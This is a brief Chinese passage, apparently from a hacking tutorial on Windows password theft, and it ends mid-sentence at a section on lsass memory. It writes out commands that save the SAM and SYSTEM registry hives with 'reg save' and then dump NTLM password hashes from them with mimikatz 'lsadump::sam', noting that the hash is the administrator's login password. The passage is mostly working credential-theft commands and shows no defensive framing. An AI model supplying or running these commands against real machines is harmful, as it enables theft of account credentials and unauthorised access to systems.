密码窃取 注册表读取密码 注册表读取密码主要获取的是两个文件： reg save HKLM\SYSTEM Sys.hivreg save HKLM\SAM Sam.hiv 导出注册表之后，我们可以通过mimikatz读取密码hash值： mimikatz读取密码mimikatz.exe "lsadump::sam /sam:Sam.hiv /system:Sys.hiv " exit> hiv.txt 其中：NTLM加密的hash就是管理员登陆的加密密码！ lsass内存读取密码 lsass.exe是一个系统…